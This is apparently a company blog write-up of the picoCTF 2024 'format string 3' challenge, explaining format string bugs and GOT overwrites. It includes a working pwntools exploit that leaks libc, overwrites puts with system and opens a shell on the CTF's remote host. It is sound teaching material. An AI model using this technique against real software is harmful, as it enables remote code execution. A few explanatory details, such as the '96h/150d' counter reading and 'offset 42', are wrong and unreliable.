Format String Exploitation: A Hands-On Exploration for Linux

Summary

This blog post covers a Capture The Flag challenge that was part of the 2024 picoCTF event, which lasted until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place on the global scoreboard. I decided to focus on the binary exploitation challenges. Although I had followed Corelan’s Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.

The challenge covers a format string vulnerability. This is a type of vulnerability where user-supplied input is used as the format string of a function such as printf(), so that any format specifiers in the input are interpreted by the application, resulting in the ability to read from and/or write to memory. The format string 3 challenge provides 4 files:

- format-string-3: the vulnerable binary

- format-string-3.c: the vulnerable binary source code

- libc.so.6: a C standard library

- ld-linux-x86-64.so.2: a dynamic linker as the interpreter

These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.

The steps of the final exploit:

1. Fetch the address of the setvbuf function in libc. This is actually provided by the vulnerable binary itself via a printf() call to simulate an information leak printed to stdout,

2. Dynamically calculate the base address of the libc library,

3. Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.

For step 2, it’s important to calculate the address dynamically (rather than hardcoding it), since the remote target loads libc at a different address every time it runs. We can verify this by running the binary multiple times: the leaked address is different on each run. This is due to Address Space Layout Randomization (ASLR), which randomizes where shared libraries such as libc are mapped. Whether the addresses of the main binary are randomized as well depends on whether it was compiled as a Position Independent Executable (PIE), which can be verified by using readelf on our binary since the binary is provided as part of the challenge.

Interesting resource to learn more about the difference between these mitigations: ASLR/PIE – Nightmare (guyinatuxedo.github.io)

Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.

Vulnerability Details

Background on string formatting

The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is passed directly as the format argument to functions such as the C library’s printf() and its variants:

int printf(const char *format, ...)

int fprintf(FILE *stream, const char *format, ...)

int sprintf(char *str, const char *format, ...)

int vprintf(const char *format, va_list arg)

int vsprintf(char *str, const char *format, va_list arg)

Even with input validation in place, passing input directly as the format argument to one of these functions (think: printf(input)) should be avoided. It’s recommended to use a constant format string with placeholders, such as printf("%s", input), instead.

The impact of a format string vulnerability can be divided in a few categories:

- Ability to read values on the stack

- Arbitrary memory reads

- Arbitrary memory writes

In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.



Background on Global Offset Table



Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries – almost any binary running on a modern system.

The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.

When an executable is programmed in C to call function and is compiled as an ELF executable, the function will be compiled as function@plt. When the program is executed, it will jump to the PLT entry of function and:

- If there is a GOT entry for

function, it jumps to the address stored there; - If there is no GOT entry, it will resolve the address and jump there.

An example of the first option, where there is a GOT entry for function, is depicted in the visual below:

During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the program’s execution to arbitrary locations, such as shellcode or other parts of memory under our control.
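To make the idea of redirecting execution through the GOT more tangible, here is a toy model in Python. It is only a sketch of the indirection, not how the dynamic linker is actually implemented, and the names `got`, `call_via_plt`, `fake_puts` and `fake_system` are hypothetical and chosen purely for illustration.

```python
# Toy model of GOT indirection (illustrative only; all names are hypothetical).

def fake_puts(arg: str) -> str:
    """Stand-in for the real puts()."""
    return f"puts printed: {arg}"


def fake_system(arg: str) -> str:
    """Stand-in for the real system()."""
    return f"system executed: {arg}"


# The "GOT": one slot per imported function, holding the target to jump to.
got = {"puts": fake_puts}


def call_via_plt(name: str, arg: str) -> str:
    """Every call goes through the table, so whoever controls a slot controls the call."""
    return got[name](arg)


before = call_via_plt("puts", "/bin/sh")

# An arbitrary write that replaces the slot redirects every later call.
got["puts"] = fake_system
after = call_via_plt("puts", "/bin/sh")

print(before)
print(after)
```

The calling code never changes: it still "calls puts", but the slot it goes through now leads somewhere else.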

Reviewing the source code

We are provided with the following source code:

#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {

setvbuf(stdin, NULL, _IONBF, 0);

setvbuf(stdout, NULL, _IONBF, 0);

setvbuf(stderr, NULL, _IONBF, 0);

}

void hello() {

puts("Howdy gamers!");

printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);

}

int main() {

char *all_strings[MAX_STRINGS] = {NULL};

char buf[1024] = {'\0'};

setup();

hello();

fgets(buf, 1024, stdin);

printf(buf);

puts(normal_string);

return 0;

}

Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:

# Making both the executable & linker executable

chmod u+x format-string-3 ld-linux-x86-64.so.2

# Executing the binary

./format-string-3

Howdy gamers!

Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f7c778eb3f0

# This is our input, ending with <enter>

test

test

/bin/sh

We note a couple of things:

- The binary provides us with the memory address of the setvbuf function in the libc library,

- We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,

- The program finishes with a puts() function call that writes /bin/sh to stdout.

This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.

Vulnerability #1: Memory Leak

If we take another look at the source code above, we notice the following line in the hello() function:

printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);

Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. Without it, we would have to find an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.

We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.
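As a rough sketch of that calculation using only the Python standard library: the helper names `parse_leak` and `libc_base` are hypothetical, and the setvbuf offset is not read from libc.so.6 here but derived from one leak/base pair that appears in the sample output later in this post.

```python
PAGE_SIZE = 0x1000


def parse_leak(line: bytes) -> int:
    """Extract the hexadecimal address that follows 'libc: ' in the banner line."""
    return int(line.split(b"libc: ")[1].strip().decode(), 16)


def libc_base(leak: int, symbol_offset: int) -> int:
    """Base address = runtime address of a symbol minus its offset inside the library."""
    return leak - symbol_offset


# Offset of setvbuf inside libc, derived from one leak/base pair in the sample output.
SETVBUF_OFFSET = 0x7F25A21DE3F0 - 0x7F25A2164000

# Banner line from a different run, also taken from the sample output.
banner = b"Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fa7c29473f0\n"
leak = parse_leak(banner)
base = libc_base(leak, SETVBUF_OFFSET)

print(hex(SETVBUF_OFFSET))
print(hex(base))
```

The resulting base is page-aligned, which is a quick sanity check that the offset and the leak belong to the same library.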

Vulnerability #2: Format String Vulnerability

In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the printf(buf) function call. In the excellent format strings paper from Universita di Pisa (see References), we learned that we can use format specifiers in C to:

- Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),

- Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,

- Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m. Then, we can write the output counter value to memory using %n, again if we provide the memory address correctly as part of our input string.

Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:

# Executing the binary

./format-string-3

Howdy gamers!

Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f2818f423f0

# This is our input, ending with <enter>

%p

# This is the output of the printf(buf) function call

# This now prints back a value as a pointer

0x7f28190a0963

/bin/sh

The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!

Exploitation

We are now armed with an information leak that provides us a memory address and a format string vulnerability. Let’s try and combine these two to get code execution on our remote system.

Calculating input string offset

Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?

Let’s first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:

Howdy gamers!

Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fa5ae99b3f0

AAAAAAAA%2$p

AAAAAAAA0xfbad208b



/bin/shIdeally (we’re explaining why later), we have a format specifier %n$p where n is an offset to point exactly at the start of our input string. You can do this manually (%p, %2$p, %3$p…) until %p points to your input string, but I did this using gdb:

# Open the program in gdb

gdb format-string-3

# Put a breakpoint at the puts function

b puts

# Run the program

r

# Continue the program since it will hit the breakpoint

# on the first puts call in our program (Howdy Gamers !)

c

# Provide our input AAAAAAAA followed by <enter>





AAAAAAAAThe program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50×8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:

You could assume that 33 is the offset we need, but there’s a catch:

From https://lettieri.iet.unipi.it/hacking/format-strings.pdf:

On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.



This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:

The offset displayed on top of the visual indicates the relative offset from the start of the stack.
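The arithmetic can be written down as a small sketch. The helper names `printf_index` and `probe` are hypothetical, and the sketch assumes the stack line is counted from 1 with 8 bytes per line, as in the gdb output described above.

```python
REGISTER_ARGS = 5  # rsi, rdx, rcx, r8 and r9 are consumed before any stack value


def printf_index(stack_line: int) -> int:
    """Convert a 1-based stack line (8 bytes per line) into a %N$ argument index."""
    return stack_line + REGISTER_ARGS


def probe(index: int, marker: bytes = b"AAAAAAAA") -> bytes:
    """Build an input that prints the chosen argument as a pointer after a marker."""
    return marker + f"%{index}$p".encode()


index = printf_index(33)
print(index)
print(probe(index))
```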

This offset now points exactly to the start of our input string:

Howdy gamers!

Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ff5ed4873f0

AAAAAAAA%38$p

AAAAAAAA0x4141414141414141

/bin/sh

AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.
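The same conversion can be reproduced with Python's struct module. Because eight identical bytes hide the byte order, the sketch also uses the string ABCDEFGH, which is purely an illustrative input and not part of the challenge.

```python
import struct

# Eight 'A' bytes (0x41) read as one little-endian 64-bit value.
as_pointer = struct.unpack("<Q", b"AAAAAAAA")[0]
print(hex(as_pointer))

# With distinct bytes the little-endian order becomes visible:
# the first byte in memory ('A') ends up as the least significant byte.
mixed = struct.unpack("<Q", b"ABCDEFGH")[0]
print(hex(mixed))
```

This byte order is why addresses embedded in an input string have to be written least significant byte first.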

Now the (probably) more critical question: why does it matter that we know how to point to our input string in memory? Up until this point, we have only been reading our own string in memory. What will happen when we replace the %p format specifier, which reads, with the %n format specifier, which writes?

Howdy gamers!

Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f4bfd3ff3f0

AAAAAAAA%38$n

zsh: segmentation fault ./format-string-3

We get a segmentation fault. What is going on? Our input string now tries to write the value of the output counter to the memory address we were pointing to before with %p, which is… our input string itself.

This means we now have control over where we can write values since we control the input string. We can also modify what we are writing to memory as long as we can control the output counter. We also have control over this, as explained before:

Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.



By changing the format specifier, we now executed the following:

To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.

In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mapped…). In the next part, we’re going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.
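To illustrate how such a write can be aimed at a chosen address, here is a minimal hand-rolled sketch that writes a single byte. The function name `build_byte_write` is hypothetical, the offset 38 is the one found above, and 0x404018 is the puts GOT address that shows up later in this post. The address is placed at the end of the input because it contains null bytes, which would otherwise end the format string early.

```python
import struct


def build_byte_write(buf_offset: int, address: int, value: int) -> bytes:
    """Build an input that writes the single byte `value` to `address` via %hhn.

    buf_offset is the %N$ index that points at the start of our input buffer.
    """
    # %c always prints at least one character, so a zero byte needs a full wrap.
    count = value if value > 0 else 256
    fmt_len = 16  # room reserved for the format part, always a multiple of 8
    while True:
        # The address sits right after the padded format part.
        slot = buf_offset + fmt_len // 8
        fmt = f"%{count}c%{slot}$hhn".encode()
        if len(fmt) <= fmt_len:
            break
        fmt_len += 8
    return fmt.ljust(fmt_len, b"a") + struct.pack("<Q", address)


payload = build_byte_write(38, 0x404018, 0x60)
print(payload)
```

The padding keeps the address aligned on an 8-byte boundary, so that one argument index maps exactly onto it.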

Local Exploitation

Let’s take a step back and think what we logically need to do. We need to:

1. Fetch the address of our setvbuf function in the libc library, provided by the program,

2. From this address, calculate the base address of libc,

3. Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,

4. Continue execution to give control to the operator.

We are going to use the popular pwntools library for Python 3 to help us out quite a bit.

First, let’s attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:

from pwn import *

p = process("./format-string-3")

info(p.recvline()) # Fetch Howdy Gamers!

info(p.recvuntil(b"libc: ")) # Fetch line right before setvbuf address

# Get setvbuf address

bytes_setvbuf_address = p.recvline()

# Convert output bytes to integer to store and work with our address

setvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(),16)

info("Received setvbuf address leak: %s", hex(setvbuf_leak))

### Sample Output

[+] Starting local process './format-string-3': pid 216507

[*] Howdy gamers!

[*] Okay I'll be nice. Here's the address of setvbuf in libc:

[*] Received setvbuf address leak: 0x7fb19acc83f0

[*] Stopped process './format-string-3' (pid 216507)

Second, we manually load libc to be able to set its base address to match our (now local, but future remote) target libc base address. We do this by subtracting the offset of setvbuf within our manually loaded libc from the leaked setvbuf address:

...

libc = ELF("./libc.so.6")

info("Calculating libc base address...")

libc.address = setvbuf_leak - libc.symbols['setvbuf']

info("libc base address: %s", hex(libc.address))

### Sample Output

[+] Starting local process './format-string-3': pid 219013

[*] Howdy gamers!

[*] Okay I'll be nice. Here's the address of setvbuf in libc:

[*] Received setvbuf address leak: 0x7f25a21de3f0

[*] Calculating libc base address...

[*] libc base address: 0x7f25a2164000

[*] Stopped process './format-string-3' (pid 219013)

Finally, we can utilize the fmtstr_payload function of pwntools to easily write:

- What: the system function address in libc

- Where: the puts entry in the GOT of our binary

Before actually executing and sending our payload, let’s make sure we understand what’s happening. We start by noting down the addresses of:

- the system function address in libc (0x7f852ddca760)

- the puts entry in the GOT of our binary (0x404018)

alongside the payload we are going to send. We do this in an interactive Python prompt, for demonstration purposes:

>>> elf = context.binary = ELF('./format-string-3')

>>> hex(libc.symbols['system'])

'0x7f852ddca760'

>>> hex(elf.got['puts'])

'0x404018'

>>> fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})

b'%96c%47$lln%31c%48$hhn%6c%49$hhn%34c%50$hhn%53c%51$hhn%81c%52$hhnaaaabaa\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00'

You can divide the payload into different blocks, each serving the purpose we expected, although it’s quite a step up from what we’ve manually done before. We can identify the pattern %mc%n$hhn (or ending in lln), which:

- Increases the output counter with m (note that the output counter does not necessarily start at 0)

- Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.
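The widths in the payload can be recomputed by hand. The sketch below is not how pwntools chooses them internally; it simply takes the write order observed in the payload above (target addresses ending in \x18, \x1d, \x1c, \x19, \x1a, \x1b, i.e. byte indexes 0, 5, 4, 1, 2, 3 of the system address) and assumes the output counter starts at 0 for this printf call. The function name `widths_for` is hypothetical.

```python
def widths_for(byte_values):
    """Return the %mc widths needed so the low byte of the counter hits each value."""
    counter = 0
    widths = []
    for target in byte_values:
        # Only the low 8 bits of the counter matter for a 1-byte write.
        pad = (target - counter) % 256
        if pad == 0:
            pad = 256  # %c prints at least one character, so wrap around fully
        widths.append(pad)
        counter += pad
    return widths


system_addr = 0x7F852DDCA760
addr_bytes = system_addr.to_bytes(8, "little")

# Order in which the payload above writes the individual bytes.
order = [0, 5, 4, 1, 2, 3]
widths = widths_for([addr_bytes[i] for i in order])
print(widths)
```

These values match the %96c, %31c, %6c, %34c, %53c and %81c blocks of the payload, with the last one relying on the counter wrapping past 0xff.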



Let’s now analyze the payload and calculate ourselves for 1 write operation to understand how the payload works. We have %96c%47$lln as the first block of our payload, which can be logically seen as a write operation. This:

- Increases the output counter with 96h (hex) or 150d (decimal)

- Writes the current value of the output counter (n, truncated by a long long (ll), or 8 bytes, to the memory address specified at offset 42:

As you can see in the payload above, offset 42 will correspond with \x18@@\x00\x00\x00\x00\x00, which is further down our payload. @ is \x40 in hex, so our target address matches the value for the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.

You’ll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since we’re working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.

After writing, the payload will continue with processing the next block %31c%48$hhn, which again increases the output counter and writes to the next offset (48). This offset contains our next address. The payload will continue until 6 blocks are executed, which corresponds to 6 %…%n statements.
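To double-check this reading of the payload, the writes can be replayed in a small simulation that uses only the Python standard library. This is a simplified model, not a printf implementation: it only understands the %mc%n$lln and %mc%n$hhn blocks used here, assumes the output counter starts at 0, and assumes offset 38 points at the start of the buffer. The names `stack_arg` and `simulate` are hypothetical.

```python
import re
import struct

BUF_OFFSET = 38  # %38$ points at the first 8 bytes of our input buffer

payload = (
    b"%96c%47$lln%31c%48$hhn%6c%49$hhn%34c%50$hhn%53c%51$hhn%81c%52$hhn"
    b"aaaabaa"
    b"\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00"
    b"\x1c@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00"
    b"\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00"
)


def stack_arg(data: bytes, index: int) -> int:
    """Return the 8-byte little-endian value that %index$ refers to inside the buffer."""
    start = (index - BUF_OFFSET) * 8
    return struct.unpack("<Q", data[start:start + 8])[0]


def simulate(data: bytes) -> dict:
    """Replay each write block and return the simulated memory as {address: byte}."""
    memory = {}
    counter = 0
    # printf stops interpreting the format string at the first null byte.
    fmt = data.split(b"\x00", 1)[0].decode("latin-1")
    for width, index, kind in re.findall(r"%(\d+)c%(\d+)\$(lln|hhn)", fmt):
        counter += int(width)
        target = stack_arg(data, int(index))
        size = 8 if kind == "lln" else 1
        value = counter % (1 << (8 * size))
        for i, byte in enumerate(value.to_bytes(size, "little")):
            memory[target + i] = byte
    return memory


memory = simulate(payload)
got_puts = bytes(memory[0x404018 + i] for i in range(8))
written = struct.unpack("<Q", got_puts)[0]
print(hex(written))
```

The 8 bytes that end up at 0x404018 form the system address noted earlier, which confirms that the six blocks together overwrite the complete GOT entry.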

Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:

...

elf = context.binary = ELF('./format-string-3')

info("Creating format string payload...")

payload = fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})

# Ready to send payload!

info("Sending payload...")

p.sendline(payload)

p.clean()

# Give control to the shell to the operator

info("Payload successfully sent, enjoy the shell!")

p.interactive()

The fmtstr_payload function really does a lot of heavy lifting for us combined with the elf and libc references. It effectively overwrites the GOT entry at elf.got['puts'] with the complete address of libc.symbols['system'] by precisely modifying the output counter and executing memory write operations.

### Sample Output

[+] Starting local process './format-string-3': pid 227263

[*] Howdy gamers!

[*] Okay I'll be nice. Here's the address of setvbuf in libc:

[*] Received setvbuf address leak: 0x7fa7c29473f0

[*] '/home/kali/picoctf/libc.so.6'

[*] Calculating libc base address...

[*] libc base address: 0x7fa7c28cd000

[*] '/home/kali/picoctf/format-string-3'

[*] Creating format string payload...

[*] Sending payload...

[*] Payload successfully sent, enjoy the shell!

[*] Switching to interactive mode

$ whoami

kali

We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!

Remote Exploitation

Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:

# Define remote targets

target_host = "rhea.picoctf.net"

target_port = 62200

# Connect to remote process

p = remote(target_host, target_port)

Note that you’ll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.

### Sample Output

...

[*] Payload successfully sent, enjoy the shell!

[*] Switching to interactive mode

$ ls flag.txt

flag.txt

That concludes the exploit, after which we can submit our flag. In a real-world scenario, getting this kind of remote code execution would clearly be a great risk.

Conclusion

The preceding challenges that lead up to this challenge (format string 0, 1, 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic to me, this was a great way to practice these types of vulnerabilities during a fun event.

Format string vulnerabilities are less common than they used to be. However, our IoT colleagues assured me they encountered some recently during an IoT device assessment.

That’s why it’s important to adhere to:

- Input Validation

- Limit User-Controlled Input

- Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities

- Secure Coding Practices

This should greatly limit the risk of format string vulnerabilities still being present in current day applications.

References

- PicoGym: https://play.picoctf.org/practice

- Hack using Global Offset Table: https://nuc13us.wordpress.com/2015/12/25/hack-using-global-offset-table/

- Format Strings Paper from Universita di Pisa: https://lettieri.iet.unipi.it/hacking/format-strings.pdf

- Format Specifiers in C: https://unstop.com/blog/format-specifiers-in-c

About the author

Wiebe Willems

Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISO’s Red Team forward to deliver even better advisory to its clients.

Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.